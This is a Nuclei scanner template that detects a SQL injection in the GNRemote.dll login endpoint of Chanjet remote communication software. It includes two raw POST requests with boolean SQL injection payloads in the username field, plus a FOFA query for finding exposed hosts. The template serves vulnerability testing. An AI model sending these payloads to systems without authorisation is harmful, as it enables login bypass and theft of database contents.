id: chanjet-gnremote-sqli

info:
  name: Changjietong Remote Communication GNRemote.dll - SQL Injection
  author: SleepingBag945
  severity: high
  description: |
    Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
  reference: |
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="远程通CHANJET_Remote"
  tags: yonyou,chanjet,sqli

http:
  - raw:
      - |
        POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip

        username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1
      - |
        POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip

        username=%22'%20or%201%3d2%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - "{\"RetCode\":0}"

      - type: word
        part: body_2
        words:
          - "{\"RetCode\":2}"

# digest: 490a00463044022059409423f5601e69825c00301e9ca83b199ae9c096845f086a078ea4bfe41cd202207eeb445f38bc99afe1460593a4485d69e447595e78738b6a6e39640d54f9200c:922c64590222798bb761d5b6d8e72950